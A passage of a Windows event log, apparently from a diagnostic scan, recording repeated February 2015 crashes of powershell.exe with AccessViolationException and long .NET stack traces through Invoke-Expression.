   at System.Dynamic.UpdateDelegates.UpdateAndExecute6[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]](System.Runtime.CompilerServices.CallSite, System.__Canon, System.__Canon, System.__Canon, Int32, Int32, Int32)
   at System.Management.Automation.Interpreter.DynamicInstruction`7[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]].Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.Interpreter.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.LightLambda.RunVoid1[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]](System.__Canon)
   at System.Management.Automation.ScriptBlock.InvokeWithPipeImpl(System.Management.Automation.ScriptBlockClauseToInvoke, Boolean, System.Collections.Generic.Dictionary`2<System.String,System.Management.Automation.ScriptBlock>, System.Collections.Generic.List`1<System.Management.Automation.PSVariable>, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Management.Automation.Internal.Pipe, System.Management.Automation.InvocationInfo, System.Object[])
   at System.Management.Automation.ScriptBlock+<>c__DisplayClassa.<InvokeWithPipe>b__8()
   at System.Management.Automation.Runspaces.RunspaceBase.RunActionIfNoRunningPipelinesWithThreadCheck(System.Action)
   at System.Management.Automation.ScriptBlock.InvokeWithPipe(Boolean, System.Collections.Generic.Dictionary`2<System.String,System.Management.Automation.ScriptBlock>, System.Collections.Generic.List`1<System.Management.Automation.PSVariable>, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Management.Automation.Internal.Pipe, System.Management.Automation.InvocationInfo, System.Object[])
   at System.Management.Automation.ScriptBlock.InvokeUsingCmdlet(System.Management.Automation.Cmdlet, Boolean, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Object[])
   at Microsoft.PowerShell.Commands.InvokeExpressionCommand.ProcessRecord()
   at System.Management.Automation.Cmdlet.DoProcessRecord()
   at System.Management.Automation.CommandProcessor.ProcessRecord()
   at System.Management.Automation.CommandProcessorBase.DoExecute()
   at System.Management.Automation.Internal.PipelineProcessor.Inject(System.Object, Boolean)
   at System.Management.Automation.Internal.PipelineProcessor.SynchronousExecuteEnumerate(System.Object, System.Collections.Hashtable, Boolean)
   at System.Management.Automation.PipelineOps.InvokePipeline(System.Object, Boolean, System.Management.Automation.CommandParameterInternal[][], System.Management.Automation.Language.CommandBaseAst[], System.Management.Automation.CommandRedirection[][], System.Management.Automation.Language.FunctionContext)
   at System.Management.Automation.Interpreter.ActionCallInstruction`6[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Boolean, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]].Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.Interpreter.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.LightLambda.RunVoid1[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]](System.__Canon)
   at System.Management.Automation.ScriptBlock.InvokeWithPipeImpl(System.Management.Automation.ScriptBlockClauseToInvoke, Boolean, System.Collections.Generic.Dictionary`2<System.String,System.Management.Automation.ScriptBlock>, System.Collections.Generic.List`1<System.Management.Automation.PSVariable>, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Management.Automation.Internal.Pipe, System.Management.Automation.InvocationInfo, System.Object[])
   at System.Management.Automation.ScriptBlock+<>c__DisplayClassa.<InvokeWithPipe>b__8()
   at System.Management.Automation.Runspaces.RunspaceBase.RunActionIfNoRunningPipelinesWithThreadCheck(System.Action)
   at System.Management.Automation.ScriptBlock.InvokeWithPipe(Boolean, System.Collections.Generic.Dictionary`2<System.String,System.Management.Automation.ScriptBlock>, System.Collections.Generic.List`1<System.Management.Automation.PSVariable>, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Management.Automation.Internal.Pipe, System.Management.Automation.InvocationInfo, System.Object[])
   at System.Management.Automation.ScriptBlock.InvokeUsingCmdlet(System.Management.Automation.Cmdlet, Boolean, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Object[])
   at Microsoft.PowerShell.Commands.InvokeExpressionCommand.ProcessRecord()
   at System.Management.Automation.Cmdlet.DoProcessRecord()
   at System.Management.Automation.CommandProcessor.ProcessRecord()
   at System.Management.Automation.CommandProcessorBase.DoExecute()
   at System.Management.Automation.Internal.PipelineProcessor.Inject(System.Object, Boolean)
   at System.Management.Automation.Internal.PipelineProcessor.SynchronousExecuteEnumerate(System.Object, System.Collections.Hashtable, Boolean)
   at System.Management.Automation.PipelineOps.InvokePipeline(System.Object, Boolean, System.Management.Automation.CommandParameterInternal[][], System.Management.Automation.Language.CommandBaseAst[], System.Management.Automation.CommandRedirection[][], System.Management.Automation.Language.FunctionContext)
   at System.Management.Automation.Interpreter.ActionCallInstruction`6[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Boolean, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]].Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.Interpreter.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.LightLambda.RunVoid1[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]](System.__Canon)
   at System.Management.Automation.DlrScriptCommandProcessor.RunClause(System.Action`1<System.Management.Automation.Language.FunctionContext>, System.Object, System.Object)
   at System.Management.Automation.DlrScriptCommandProcessor.Complete()
   at System.Management.Automation.CommandProcessorBase.DoComplete()
   at System.Management.Automation.Internal.PipelineProcessor.DoCompleteCore(System.Management.Automation.CommandProcessorBase)
   at System.Management.Automation.Internal.PipelineProcessor.SynchronousExecuteEnumerate(System.Object, System.Collections.Hashtable, Boolean)
   at System.Management.Automation.Runspaces.LocalPipeline.InvokeHelper()
   at System.Management.Automation.Runspaces.LocalPipeline.InvokeThreadProc()
   at System.Management.Automation.Runspaces.PipelineThread.WorkerProc()
   at System.Threading.ThreadHelper.ThreadStart_Context(System.Object)
   at System.Threading.ExecutionContext.RunInternal(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object, Boolean)
   at System.Threading.ExecutionContext.Run(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object, Boolean)
   at System.Threading.ExecutionContext.Run(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object)
   at System.Threading.ThreadHelper.ThreadStart()
 
Error: (02/21/2015 10:40:24 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: powershell.exe, version: 6.3.9600.16384, time stamp: 0x52158733
Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000
Exception code: 0xc0000005
Fault offset: 0x039292b8
Faulting process id: 0x6e0
Faulting application start time: 0xpowershell.exe0
Faulting application path: powershell.exe1
Faulting module path: powershell.exe2
Report Id: powershell.exe3
Faulting package full name: powershell.exe4
Faulting package-relative application ID: powershell.exe5
 
Error: (02/21/2015 10:40:24 PM) (Source: .NET Runtime) (EventID: 1026) (User: )
Description: Application: powershell.exe
Framework Version: v4.0.30319
Description: The process was terminated due to an unhandled exception.
Exception Info: System.AccessViolationException
Stack:
   at DynamicClass.CallSite.Target(System.Runtime.CompilerServices.Closure, System.Runtime.CompilerServices.CallSite, System.Object, System.Object, System.Object, Int32, Int32, Int32)
   at System.Dynamic.UpdateDelegates.UpdateAndExecute6[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]](System.Runtime.CompilerServices.CallSite, System.__Canon, System.__Canon, System.__Canon, Int32, Int32, Int32)
   at System.Management.Automation.Interpreter.DynamicInstruction`7[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]].Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.Interpreter.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.LightLambda.RunVoid1[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]](System.__Canon)
   at System.Management.Automation.ScriptBlock.InvokeWithPipeImpl(System.Management.Automation.ScriptBlockClauseToInvoke, Boolean, System.Collections.Generic.Dictionary`2<System.String,System.Management.Automation.ScriptBlock>, System.Collections.Generic.List`1<System.Management.Automation.PSVariable>, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Management.Automation.Internal.Pipe, System.Management.Automation.InvocationInfo, System.Object[])
   at System.Management.Automation.ScriptBlock+<>c__DisplayClassa.<InvokeWithPipe>b__8()
   at System.Management.Automation.Runspaces.RunspaceBase.RunActionIfNoRunningPipelinesWithThreadCheck(System.Action)
   at System.Management.Automation.ScriptBlock.InvokeWithPipe(Boolean, System.Collections.Generic.Dictionary`2<System.String,System.Management.Automation.ScriptBlock>, System.Collections.Generic.List`1<System.Management.Automation.PSVariable>, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Management.Automation.Internal.Pipe, System.Management.Automation.InvocationInfo, System.Object[])
   at System.Management.Automation.ScriptBlock.InvokeUsingCmdlet(System.Management.Automation.Cmdlet, Boolean, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Object[])
   at Microsoft.PowerShell.Commands.InvokeExpressionCommand.ProcessRecord()
   at System.Management.Automation.Cmdlet.DoProcessRecord()
   at System.Management.Automation.CommandProcessor.ProcessRecord()
   at System.Management.Automation.CommandProcessorBase.DoExecute()
   at System.Management.Automation.Internal.PipelineProcessor.Inject(System.Object, Boolean)
   at System.Management.Automation.Internal.PipelineProcessor.SynchronousExecuteEnumerate(System.Object, System.Collections.Hashtable, Boolean)
   at System.Management.Automation.PipelineOps.InvokePipeline(System.Object, Boolean, System.Management.Automation.CommandParameterInternal[][], System.Management.Automation.Language.CommandBaseAst[], System.Management.Automation.CommandRedirection[][], System.Management.Automation.Language.FunctionContext)
   at System.Management.Automation.Interpreter.ActionCallInstruction`6[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Boolean, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]].Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.Interpreter.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.LightLambda.RunVoid1[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]](System.__Canon)
   at System.Management.Automation.ScriptBlock.InvokeWithPipeImpl(System.Management.Automation.ScriptBlockClauseToInvoke, Boolean, System.Collections.Generic.Dictionary`2<System.String,System.Management.Automation.ScriptBlock>, System.Collections.Generic.List`1<System.Management.Automation.PSVariable>, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Management.Automation.Internal.Pipe, System.Management.Automation.InvocationInfo, System.Object[])
   at System.Management.Automation.ScriptBlock+<>c__DisplayClassa.<InvokeWithPipe>b__8()
   at System.Management.Automation.Runspaces.RunspaceBase.RunActionIfNoRunningPipelinesWithThreadCheck(System.Action)
   at System.Management.Automation.ScriptBlock.InvokeWithPipe(Boolean, System.Collections.Generic.Dictionary`2<System.String,System.Management.Automation.ScriptBlock>, System.Collections.Generic.List`1<System.Management.Automation.PSVariable>, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Management.Automation.Internal.Pipe, System.Management.Automation.InvocationInfo, System.Object[])
   at System.Management.Automation.ScriptBlock.InvokeUsingCmdlet(System.Management.Automation.Cmdlet, Boolean, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Object[])
   at Microsoft.PowerShell.Commands.InvokeExpressionCommand.ProcessRecord()
   at System.Management.Automation.Cmdlet.DoProcessRecord()
   at System.Management.Automation.CommandProcessor.ProcessRecord()
   at System.Management.Automation.CommandProcessorBase.DoExecute()
   at System.Management.Automation.Internal.PipelineProcessor.Inject(System.Object, Boolean)
   at System.Management.Automation.Internal.PipelineProcessor.SynchronousExecuteEnumerate(System.Object, System.Collections.Hashtable, Boolean)
   at System.Management.Automation.PipelineOps.InvokePipeline(System.Object, Boolean, System.Management.Automation.CommandParameterInternal[][], System.Management.Automation.Language.CommandBaseAst[], System.Management.Automation.CommandRedirection[][], System.Management.Automation.Language.FunctionContext)
   at System.Management.Automation.Interpreter.ActionCallInstruction`6[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Boolean, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]].Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.Interpreter.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.LightLambda.RunVoid1[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]](System.__Canon)
   at System.Management.Automation.DlrScriptCommandProcessor.RunClause(System.Action`1<System.Management.Automation.Language.FunctionContext>, System.Object, System.Object)
   at System.Management.Automation.DlrScriptCommandProcessor.Complete()
   at System.Management.Automation.CommandProcessorBase.DoComplete()
   at System.Management.Automation.Internal.PipelineProcessor.DoCompleteCore(System.Management.Automation.CommandProcessorBase)
   at System.Management.Automation.Internal.PipelineProcessor.SynchronousExecuteEnumerate(System.Object, System.Collections.Hashtable, Boolean)
   at System.Management.Automation.Runspaces.LocalPipeline.InvokeHelper()
   at System.Management.Automation.Runspaces.LocalPipeline.InvokeThreadProc()
   at System.Management.Automation.Runspaces.PipelineThread.WorkerProc()
   at System.Threading.ThreadHelper.ThreadStart_Context(System.Object)
   at System.Threading.ExecutionContext.RunInternal(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object, Boolean)
   at System.Threading.ExecutionContext.Run(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object, Boolean)
   at System.Threading.ExecutionContext.Run(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object)
   at System.Threading.ThreadHelper.ThreadStart()
 
Error: (02/21/2015 10:38:01 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: powershell.exe, version: 6.3.9600.16384, time stamp: 0x52158733
Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000
Exception code: 0xc0000005
Fault offset: 0x03048ce8
Faulting process id: 0x1378
Faulting application start time: 0xpowershell.exe0
Faulting application path: powershell.exe1
Faulting module path: powershell.exe2
Report Id: powershell.exe3
Faulting package full name: powershell.exe4
Faulting package-relative application ID: powershell.exe5
 
Error: (02/21/2015 10:38:00 PM) (Source: .NET Runtime) (EventID: 1026) (User: )
Description: Application: powershell.exe
Framework Version: v4.0.30319
Description: The process was terminated due to an unhandled exception.
Exception Info: System.AccessViolationException
Stack:
   at DynamicClass.CallSite.Target(System.Runtime.CompilerServices.Closure, System.Runtime.CompilerServices.CallSite, System.Object, System.Object, System.Object, Int32, Int32, Int32)
   at System.Dynamic.UpdateDelegates.UpdateAndExecute6[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]](System.Runtime.CompilerServices.CallSite, System.__Canon, System.__Canon, System.__Canon, Int32, Int32, Int32)
   at System.Management.Automation.Interpreter.DynamicInstruction`7[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]].Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.Interpreter.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.LightLambda.RunVoid1[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]](System.__Canon)
   at System.Management.Automation.ScriptBlock.InvokeWithPipeImpl(System.Management.Automation.ScriptBlockClauseToInvoke, Boolean, System.Collections.Generic.Dictionary`2<System.String,System.Management.Automation.ScriptBlock>, System.Collections.Generic.List`1<System.Management.Automation.PSVariable>, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Management.Automation.Internal.Pipe, System.Management.Automation.InvocationInfo, System.Object[])
   at System.Management.Automation.ScriptBlock+<>c__DisplayClassa.<InvokeWithPipe>b__8()
   at System.Management.Automation.Runspaces.RunspaceBase.RunActionIfNoRunningPipelinesWithThreadCheck(System.Action)
   at System.Management.Automation.ScriptBlock.InvokeWithPipe(Boolean, System.Collections.Generic.Dictionary`2<System.String,System.Management.Automation.ScriptBlock>, System.Collections.Generic.List`1<System.Management.Automation.PSVariable>, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Management.Automation.Internal.Pipe, System.Management.Automation.InvocationInfo, System.Object[])
   at System.Management.Automation.ScriptBlock.InvokeUsingCmdlet(System.Management.Automation.Cmdlet, Boolean, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Object[])
   at Microsoft.PowerShell.Commands.InvokeExpressionCommand.ProcessRecord()
   at System.Management.Automation.Cmdlet.DoProcessRecord()
   at System.Management.Automation.CommandProcessor.ProcessRecord()
   at System.Management.Automation.CommandProcessorBase.DoExecute()
   at System.Management.Automation.Internal.PipelineProcessor.Inject(System.Object, Boolean)
   at System.Management.Automation.Internal.PipelineProcessor.SynchronousExecuteEnumerate(System.Object, System.Collections.Hashtable, Boolean)
   at System.Management.Automation.PipelineOps.InvokePipeline(System.Object, Boolean, System.Management.Automation.CommandParameterInternal[][], System.Management.Automation.Language.CommandBaseAst[], System.Management.Automation.CommandRedirection[][], System.Management.Automation.Language.FunctionContext)
   at System.Management.Automation.Interpreter.ActionCallInstruction`6[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Boolean, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]].Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.Interpreter.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.LightLambda.RunVoid1[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]](System.__Canon)
   at System.Management.Automation.ScriptBlock.InvokeWithPipeImpl(System.Management.Automation.ScriptBlockClauseToInvoke, Boolean, System.Collections.Generic.Dictionary`2<System.String,System.Management.Automation.ScriptBlock>, System.Collections.Generic.List`1<System.Management.Automation.PSVariable>, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Management.Automation.Internal.Pipe, System.Management.Automation.InvocationInfo, System.Object[])
   at System.Management.Automation.ScriptBlock+<>c__DisplayClassa.<InvokeWithPipe>b__8()
   at System.Management.Automation.Runspaces.RunspaceBase.RunActionIfNoRunningPipelinesWithThreadCheck(System.Action)
   at System.Management.Automation.ScriptBlock.InvokeWithPipe(Boolean, System.Collections.Generic.Dictionary`2<System.String,System.Management.Automation.ScriptBlock>, System.Collections.Generic.List`1<System.Management.Automation.PSVariable>, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Management.Automation.Internal.Pipe, System.Management.Automation.InvocationInfo, System.Object[])
   at System.Management.Automation.ScriptBlock.InvokeUsingCmdlet(System.Management.Automation.Cmdlet, Boolean, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Object[])
   at Microsoft.PowerShell.Commands.InvokeExpressionCommand.ProcessRecord()
   at System.Management.Automation.Cmdlet.DoProcessRecord()
   at System.Management.Automation.CommandProcessor.ProcessRecord()
   at System.Management.Automation.CommandProcessorBase.DoExecute()
   at System.Management.Automation.Internal.PipelineProcessor.Inject(System.Object, Boolean)
   at System.Management.Automation.Internal.PipelineProcessor.SynchronousExecuteEnumerate(System.Object, System.Collections.Hashtable, Boolean)
   at System.Management.Automation.PipelineOps.InvokePipeline(System.Object, Boolean, System.Management.Automation.CommandParameterInternal[][], System.Management.Automation.Language.CommandBaseAst[], System.Management.Automation.CommandRedirection[][], System.Management.Automation.Language.FunctionContext)
   at System.Management.Automation.Interpreter.ActionCallInstruction`6[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Boolean, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]].Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.Interpreter.Run(System.Management.Automation.Interpreter.InterpretedFrame)
